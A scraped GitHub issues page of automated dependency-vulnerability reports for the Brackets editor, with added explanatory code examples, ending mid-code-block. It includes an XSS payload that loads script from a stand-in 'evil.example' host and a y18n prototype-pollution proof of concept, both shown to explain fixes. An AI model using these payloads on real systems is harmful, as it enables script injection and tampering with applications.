
brackets' Introduction

brackets

An open source code editor for the web, written in JavaScript, HTML and CSS.

brackets' People

Contributors

adrocknaphobia, alltom, amritayan, bkerensa, cantrell, cfjedimaster, chrisbank, conradz, fisherinnovation, garthdb, gruehle, idflood, jasonsanjose, joelrbrandt, jrowny, mend-bolt-for-github[bot], mikechambers, mynetx, njx, peterflynn, pthiess, raymondlim, redmunds, ryanstewart, tklubock, tvoliter, xsythe

brackets' Issues

CVE-2019-16769 (Medium) detected in serialize-javascript-1.9.1.tgz - autoclosed

CVE-2019-16769 - Medium Severity Vulnerability

Vulnerable Library - serialize-javascript-1.9.1.tgz

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/serialize-javascript/package.json

Dependency Hierarchy:

  • webpack-4.0.0.tgz (Root Library)
    • uglifyjs-webpack-plugin-1.3.0.tgz
      • serialize-javascript-1.9.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: master

Vulnerability Details

The serialize-javascript npm package before version 2.1.1 is vulnerable to Cross-site Scripting (XSS). It does not properly mitigate against unsafe characters in serialized regular expressions. This vulnerability does not affect the Node.js environment, since Node.js's implementation of RegExp.prototype.toString() backslash-escapes all forward slashes in regular expressions. If serialized data of regular expression objects is used in an environment other than Node.js, it is affected by this vulnerability.
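
The mechanism above, as an added example (this is not serialize-javascript's code and not from the Brackets project). The hostile pattern source and the host name `evil.example` are constructed for the demo; the naive serializer takes the pattern source as a plain string so that an engine which does not escape "/" in RegExp#source, the non-Node case the advisory describes, can be simulated from Node itself. The hardened serializer replaces `<`, `>`, `/` and the line terminators U+2028/U+2029 with JavaScript unicode escapes, which is the kind of fix the advisory's patched version applies.

```javascript
// Added example, not from serialize-javascript or Brackets.

// Characters that can break out of an inline <script> block (or a JS string
// literal), mapped to unicode escapes. Inside a JS string literal "\u003C"
// still evaluates to "<", so the round trip is lossless.
const UNSAFE = {
  '<': '\\u003C',
  '>': '\\u003E',
  '/': '\\u002F',
  '\u2028': '\\u2028',
  '\u2029': '\\u2029',
};
const UNSAFE_RE = /[<>\/\u2028\u2029]/g;

function escapeUnsafeChars(str) {
  return str.replace(UNSAFE_RE, (c) => UNSAFE[c]);
}

// Naive serializer: emits the pattern source verbatim (JSON-quoted only).
// `source` is passed in as a string to simulate an engine whose
// RegExp#source does NOT escape "/".
function serializeRegExpNaive(source, flags) {
  return `new RegExp(${JSON.stringify(source)}, ${JSON.stringify(flags)})`;
}

// Hardened serializer: the JSON-quoted pattern is additionally escaped so the
// output can never contain the byte sequence "</script".
function serializeRegExpSafe(source, flags) {
  return `new RegExp(${escapeUnsafeChars(JSON.stringify(source))}, ${JSON.stringify(flags)})`;
}

// Evaluate the serialized text back into a RegExp (what the consumer does).
function revive(serialized) {
  return new Function(`return ${serialized};`)();
}

// Does this engine escape "/" in RegExp#source? Node/V8 does, per ES2015.
function engineEscapesSlash() {
  return new RegExp('a/b').source === 'a\\/b';
}

// Would embedding `serialized` inside <script>...</script> let the payload
// close the script block early?
function breaksOutOfScript(serialized) {
  return /<\/script/i.test(serialized);
}

// Constructed attacker-controlled pattern, as a non-escaping engine would
// expose it via RegExp#source.
const attackerSource = '</script><script src=//evil.example/x.js></script>';

function demoSerialize() {
  const naive = serializeRegExpNaive(attackerSource, 'g');
  const safe = serializeRegExpSafe(attackerSource, 'g');
  return {
    naiveBreaksOut: breaksOutOfScript(naive),        // true
    safeBreaksOut: breaksOutOfScript(safe),          // false
    safeRoundTrips: revive(safe).test(attackerSource), // true: revived regex still works
    safeFlags: revive(safe).flags,                   // 'g'
    nodeEscapesSlash: engineEscapesSlash(),          // true on Node
  };
}

console.log(demoSerialize());
```

The `nodeEscapesSlash` check is the advisory's "not affected on Node.js" caveat made testable: when it returns false in a given runtime, the naive serializer is exploitable there even without simulating the source string.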

Publish Date: 2019-12-05

URL: CVE-2019-16769

CVSS 3 Score Details (5.4)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16769

Release Date: 2019-12-05

Fix Resolution: v2.1.1


Step up your Open Source Security Game with WhiteSource here

CVE-2020-7774 (High) detected in y18n-4.0.0.tgz, y18n-3.2.1.tgz - autoclosed

CVE-2020-7774 - High Severity Vulnerability

Vulnerable Libraries - y18n-4.0.0.tgz, y18n-3.2.1.tgz

y18n-4.0.0.tgz

the bare-bones internationalization library used by yargs

Library home page: https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/npm/node_modules/y18n/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • cacache-12.0.3.tgz
      • y18n-4.0.0.tgz (Vulnerable Library)

y18n-3.2.1.tgz

the bare-bones internationalization library used by yargs

Library home page: https://registry.npmjs.org/y18n/-/y18n-3.2.1.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/npm/node_modules/yargs/node_modules/y18n/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • libnpx-10.2.2.tgz
      • yargs-11.1.1.tgz
        • y18n-3.2.1.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix (the locale name is `__proto__`; the underscores were lost to markdown rendering):

    const y18n = require('y18n')();
    y18n.setLocale('__proto__');          // the locale name is used as a key into y18n's cache object
    y18n.updateLocale({polluted: true});  // merges into cache['__proto__'], i.e. Object.prototype
    console.log(polluted);                // true

Publish Date: 2020-11-17

URL: CVE-2020-7774

CVSS 3 Score Details (7.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low


Suggested Fix

Type: Upgrade version

Origin: https://www.npmjs.com/advisories/1654

Release Date: 2020-11-17

Fix Resolution: 3.2.2, 4.0.1, 5.0.5



CVE-2021-23343 (High) detected in path-parse-1.0.6.tgz - autoclosed

CVE-2021-23343 - High Severity Vulnerability

Vulnerable Library - path-parse-1.0.6.tgz

Node.js path.parse() ponyfill

Library home page: https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/npm/node_modules/path-parse/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • normalize-package-data-2.5.0.tgz
      • resolve-1.10.0.tgz
        • path-parse-1.0.6.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.

Publish Date: 2021-05-04

URL: CVE-2021-23343

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: jbgutierrez/path-parse#8

Release Date: 2021-05-04

Fix Resolution: path-parse - 1.0.7



CVE-2018-20676 (Medium) detected in bootstrap-2.0.3.min.js - autoclosed

CVE-2018-20676 - Medium Severity Vulnerability

Vulnerable Library - bootstrap-2.0.3.min.js

The most popular front-end framework for developing responsive, mobile first projects on the web.

Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js

Path to dependency file: brackets/test/SpecRunner.html

Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js

Dependency Hierarchy:

  • bootstrap-2.0.3.min.js (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.

Publish Date: 2019-01-09

URL: CVE-2018-20676

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20676

Release Date: 2019-01-09

Fix Resolution: bootstrap - 3.4.0



CVE-2018-1000620 (High) detected in cryptiles-2.0.5.tgz - autoclosed

CVE-2018-1000620 - High Severity Vulnerability

Vulnerable Library - cryptiles-2.0.5.tgz

General purpose crypto utilities

Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz

Path to dependency file: brackets/src/package.json

Path to vulnerable library: brackets/src/node_modules/cryptiles/package.json,brackets/node_modules/cryptiles/package.json

Dependency Hierarchy:

  • request-2.79.0.tgz (Root Library)
    • hawk-3.1.3.tgz
      • cryptiles-2.0.5.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

cryptiles (Eran Hammer) versions 4.1.1 and earlier contain a CWE-331: Insufficient Entropy vulnerability in the randomDigits() method. As a result, an attacker is more likely to be able to brute-force something that was supposed to be random. Exploitability depends upon the calling application. This vulnerability appears to have been fixed in 4.1.2.

Publish Date: 2018-07-09

URL: CVE-2018-1000620

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000620

Release Date: 2018-07-09

Fix Resolution: v4.1.2



WS-2015-0033 (High) detected in uglify-js-2.2.5.tgz, uglify-js-1.0.7.tgz - autoclosed

WS-2015-0033 - High Severity Vulnerability

Vulnerable Libraries - uglify-js-2.2.5.tgz, uglify-js-1.0.7.tgz

uglify-js-2.2.5.tgz

JavaScript parser, mangler/compressor and beautifier toolkit

Library home page: https://registry.npmjs.org/uglify-js/-/uglify-js-2.2.5.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/uglify-js/package.json

Dependency Hierarchy:

  • grunt-contrib-uglify-0.2.0.tgz (Root Library)
    • uglify-js-2.2.5.tgz (Vulnerable Library)

uglify-js-1.0.7.tgz

Library home page: https://registry.npmjs.org/uglify-js/-/uglify-js-1.0.7.tgz

Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json

Path to vulnerable library: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/uglify-js/package.json

Dependency Hierarchy:

  • grunt-0.3.9.tgz (Root Library)
    • uglify-js-1.0.7.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: checkTravis

Vulnerability Details

uglifier incorrectly handles non-boolean comparisons during minification. The upstream library for the Ruby uglifier gem, UglifyJS, is affected by a vulnerability that allows a specially crafted JavaScript file to have altered functionality after minification. This bug, found in UglifyJS versions 2.4.23 and earlier, was demonstrated to allow potentially malicious code to be hidden within apparently secure code and activated by the minification process.

Publish Date: 2015-07-22

URL: WS-2015-0033

CVSS 3 Score Details (7.2)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://hakiri.io/technologies/uglifier/issues/279911d9720338

Release Date: 2020-06-07

Fix Resolution: Uglifier - 2.7.2;uglify-js - v2.4.24



CVE-2017-16138 (High) detected in mime-1.4.0.tgz - autoclosed

CVE-2017-16138 - High Severity Vulnerability

Vulnerable Library - mime-1.4.0.tgz

A comprehensive library for mime-type mapping

Library home page: https://registry.npmjs.org/mime/-/mime-1.4.0.tgz

Path to dependency file: brackets/src/package.json

Path to vulnerable library: brackets/src/node_modules/mime/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • mime-1.4.0.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

The mime module < 1.4.1, 2.0.1, 2.0.2 is vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.

Publish Date: 2018-06-07

URL: CVE-2017-16138

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16138

Release Date: 2018-06-07

Fix Resolution: 1.4.1,2.0.3



CVE-2019-8331 (Medium) detected in bootstrap-2.0.3.min.js - autoclosed

CVE-2019-8331 - Medium Severity Vulnerability

Vulnerable Library - bootstrap-2.0.3.min.js

The most popular front-end framework for developing responsive, mobile first projects on the web.

Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js

Path to dependency file: brackets/test/SpecRunner.html

Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js

Dependency Hierarchy:

  • bootstrap-2.0.3.min.js (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.

Publish Date: 2019-02-20

URL: CVE-2019-8331

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: twbs/bootstrap#28236

Release Date: 2019-02-20

Fix Resolution: bootstrap - 3.4.1,4.3.1;bootstrap-sass - 3.4.1,4.3.1



CVE-2020-11023 (Medium) detected in jquery-2.1.3.min.js, jquery-1.7.1.min.js - autoclosed

CVE-2020-11023 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js

jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: brackets/src/index.html

Path to vulnerable library: /src/thirdparty/jquery-2.1.3.min.js,/test/../src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (e.g. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Publish Date: 2020-04-29

URL: CVE-2020-11023

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://github.com/jquery/jquery/security/advisories/GHSA-jpcq-cgw6-v4j6,https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440

Release Date: 2020-04-29

Fix Resolution: jquery - 3.5.0;jquery-rails - 4.4.0



CVE-2016-10540 (High) detected in multiple libraries

CVE-2016-10540 - High Severity Vulnerability

Vulnerable Libraries - minimatch-0.4.0.tgz, minimatch-0.3.0.tgz, minimatch-0.2.14.tgz

minimatch-0.4.0.tgz

a glob matcher in javascript

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-0.4.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/fileset/node_modules/minimatch/package.json

Dependency Hierarchy:

  • jasmine-node-1.11.0.tgz (Root Library)
    • gaze-0.3.4.tgz
      • fileset-0.1.8.tgz
        • minimatch-0.4.0.tgz (Vulnerable Library)

minimatch-0.3.0.tgz

a glob matcher in javascript

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/fileset/node_modules/glob/node_modules/minimatch/package.json,/node_modules/grunt-cli/node_modules/minimatch/package.json,/src/extensions/default/JavaScriptCodeHints/node_modules/glob/node_modules/minimatch/package.json

Dependency Hierarchy:

  • tern-0.20.0.tgz (Root Library)
    • glob-3.2.11.tgz
      • minimatch-0.3.0.tgz (Vulnerable Library)

minimatch-0.2.14.tgz

a glob matcher in javascript

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-0.2.14.tgz

Path to dependency file: /src/extensions/default/JavaScriptCodeHints/package.json

Path to vulnerable library: /src/extensions/default/JavaScriptCodeHints/node_modules/minimatch/package.json,/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/minimatch/package.json,/node_modules/jasmine-node/node_modules/minimatch/package.json

Dependency Hierarchy:

  • tern-0.20.0.tgz (Root Library)
    • minimatch-0.2.14.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the pattern parameter.

Publish Date: 2018-04-26

URL: CVE-2016-10540

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2016-10540

Release Date: 2018-04-26

Fix Resolution (minimatch): 3.0.2

Direct dependency fix Resolution (jasmine-node): 1.14.6

Fix Resolution (minimatch): 3.0.2

Direct dependency fix Resolution (tern): 0.21.0

Fix Resolution (minimatch): 3.0.2

Direct dependency fix Resolution (tern): 0.21.0



WS-2018-0076 (Medium) detected in tunnel-agent-0.4.3.tgz - autoclosed

WS-2018-0076 - Medium Severity Vulnerability

Vulnerable Library - tunnel-agent-0.4.3.tgz

HTTP proxy tunneling agent. Formerly part of mikeal/request, now a standalone module.

Library home page: https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.4.3.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/tunnel-agent/package.json

Dependency Hierarchy:

  • request-2.79.0.tgz (Root Library)
    • tunnel-agent-0.4.3.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure.

This is exploitable if user supplied input is provided to the auth value and is a number.
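
The bug class behind this advisory, as an added example (not tunnel-agent's code, not from Brackets): the `auth` value is turned into a Buffer for a Proxy-Authorization header, and if the caller-supplied value is a number the legacy `Buffer(number)` constructor allocates that many bytes of uninitialised memory instead of encoding a string, which then leaves the process base64-encoded. Modern Node zero-fills `Buffer(number)`, so `Buffer.allocUnsafe` stands in for the old semantics here; the header format is the standard Basic scheme and the inputs are constructed.

```javascript
// Added example, not from tunnel-agent or Brackets.

// Stand-in for the legacy Buffer(value) constructor: a number meant
// "allocate this many bytes", anything else meant "encode this".
// Buffer.allocUnsafe reproduces the uninitialised-memory behaviour.
function legacyBuffer(value) {
  return typeof value === 'number'
    ? Buffer.allocUnsafe(value)
    : Buffer.from(String(value));
}

// Vulnerable: trusts whatever type `auth` arrives as. A numeric auth of
// 1000 yields ~1 KB of process memory in the outgoing header.
function proxyAuthHeaderUnsafe(auth) {
  return 'Basic ' + legacyBuffer(auth).toString('base64');
}

// Hardened: only strings are ever encoded, with an explicit encoding;
// any other type is rejected before it reaches an allocator.
function proxyAuthHeaderSafe(auth) {
  if (typeof auth !== 'string') {
    throw new TypeError('proxy auth must be a string');
  }
  return 'Basic ' + Buffer.from(auth, 'utf8').toString('base64');
}

// Bytes of raw memory the unsafe path would expose for a given input.
function exposedByteCount(auth) {
  return typeof auth === 'number' ? auth : 0;
}

console.log(proxyAuthHeaderSafe('user:pass'));
console.log('unsafe header length for auth=1000:', proxyAuthHeaderUnsafe(1000).length);
```

The general lesson is the one the advisory hints at with "and is a number": any API that overloads a single argument as both "data to encode" and "size to allocate" needs a type check at the trust boundary, not deeper in the library.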

Publish Date: 2017-03-05

URL: WS-2018-0076

CVSS 3 Score Details (5.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://nodesecurity.io/advisories/598

Release Date: 2018-01-27

Fix Resolution: 0.6.0



CVE-2017-15010 (High) detected in tough-cookie-2.3.2.tgz

CVE-2017-15010 - High Severity Vulnerability

Vulnerable Library - tough-cookie-2.3.2.tgz

RFC6265 Cookies and Cookie Jar for node.js

Library home page: https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.3.2.tgz

Path to dependency file: /src/package.json

Path to vulnerable library: /src/node_modules/tough-cookie/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • tough-cookie-2.3.2.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

A ReDoS (regular expression denial of service) flaw was found in the tough-cookie module before 2.3.3 for Node.js. An attacker that is able to make an HTTP request using a specially crafted cookie may cause the application to consume an excessive amount of CPU.

Publish Date: 2017-10-04

URL: CVE-2017-15010

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2017-15010

Release Date: 2017-10-03

Fix Resolution (tough-cookie): 2.3.3

Direct dependency fix Resolution (less): 2.7.3



CVE-2021-23343 (High) detected in path-parse-1.0.6.tgz

CVE-2021-23343 - High Severity Vulnerability

Vulnerable Library - path-parse-1.0.6.tgz

Node.js path.parse() ponyfill

Library home page: https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/npm/node_modules/path-parse/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • normalize-package-data-2.5.0.tgz
      • resolve-1.10.0.tgz
        • path-parse-1.0.6.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.
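
Four reports on this page are Regular Expression Denial of Service: CVE-2021-23343 (path-parse, above), CVE-2017-16138 (mime), CVE-2016-10540 (minimatch) and CVE-2017-15010 (tough-cookie). The page does not reproduce any of their patterns, so the following added example (not code from those projects or from Brackets) uses an assumed pattern of the simplest polynomial shape, an unanchored `.*` followed by a separator class, which is what a file-extension lookup of the mime kind looks like. It shows why a missing `^` turns a linear match into a quadratic one, the anchored and regex-free fixes, and the input-length cap a lookup on untrusted input should have regardless. The 255-byte limit and the MIME table are assumptions for the demo.

```javascript
// Added example, not from path-parse, mime, minimatch, tough-cookie or Brackets.

// Vulnerable shape: unanchored ".*" then a separator. When the input has no
// separator the engine retries from every start position and backtracks
// over the whole tail each time: O(n^2) steps for n characters.
function extensionQuadratic(path) {
  return path.replace(/.*[.\/\\]/, '').toLowerCase();
}

// Linear fix: anchoring with "^" leaves exactly one start position, so a
// failed match costs O(n).
function extensionAnchored(path) {
  return path.replace(/^.*[.\/\\]/, '').toLowerCase();
}

// Regex-free alternative: one backwards scan to the last separator.
function extensionLinear(path) {
  let i = path.length - 1;
  while (i >= 0 && path[i] !== '.' && path[i] !== '/' && path[i] !== '\\') i -= 1;
  return path.slice(i + 1).toLowerCase();
}

// Defence in depth for a lookup fed untrusted input: bound the size before
// any matching happens. The limit is an assumption for this example.
const MAX_LOOKUP_LENGTH = 255;
function safeLookup(path, table) {
  if (typeof path !== 'string' || path.length > MAX_LOOKUP_LENGTH) return null;
  const ext = extensionLinear(path);
  return Object.prototype.hasOwnProperty.call(table, ext) ? table[ext] : null;
}

// Wall-clock cost of one call in milliseconds, to make the growth visible.
function timeMs(fn, input) {
  const t0 = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

// Constructed inputs: a hostile path with no separator at all, and a tiny
// MIME table.
const HOSTILE = 'a'.repeat(10000);
const TYPES = { js: 'application/javascript', html: 'text/html' };

for (const n of [1000, 2000, 4000]) {
  const input = 'a'.repeat(n);
  console.log(
    `n=${n}`,
    'quadratic', timeMs(extensionQuadratic, input).toFixed(2), 'ms;',
    'anchored', timeMs(extensionAnchored, input).toFixed(3), 'ms',
  );
}
console.log(safeLookup('lib/app.JS', TYPES), safeLookup(HOSTILE, TYPES));
```

Doubling n should roughly quadruple the quadratic timing and only double the anchored one; that ratio, not the absolute number, is the signal to look for when triaging a suspected ReDoS pattern.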

Publish Date: 2021-05-04

URL: CVE-2021-23343

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Release Date: 2021-05-04

Fix Resolution (path-parse): 1.0.7

Direct dependency fix Resolution (npm): 6.14.7



CVE-2020-7656 (Medium) detected in jquery-1.7.1.min.js, jquery-1.3.2.min.js - autoclosed

CVE-2020-7656 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-1.7.1.min.js, jquery-1.3.2.min.js

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

jquery-1.3.2.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.3.2/jquery.min.js

Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/temp_tests.html

Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/vendor/jquery.js

Dependency Hierarchy:

  • jquery-1.3.2.min.js (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags whose closing tag contains a whitespace character, i.e. "</script >", which results in the enclosed script being executed.
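
The failure mode above, as an added example (not jQuery's code, not from Brackets): a fetched HTML fragment is "cleaned" by deleting script blocks with a regular expression before insertion, and a closing tag written as `</script >` slips past the pattern that only knows `</script>`. The two patterns and the payload are constructed for the demo; they are not jQuery's actual expressions. The last function shows the alternative that does not depend on a stripping regex at all.

```javascript
// Added example, not from jQuery or Brackets.

// Naive: only recognises the exact closing tag "</script>".
const NAIVE_SCRIPT_RE = /<script\b[\s\S]*?<\/script>/gi;
// Tolerant of whitespace before ">" in the closing tag.
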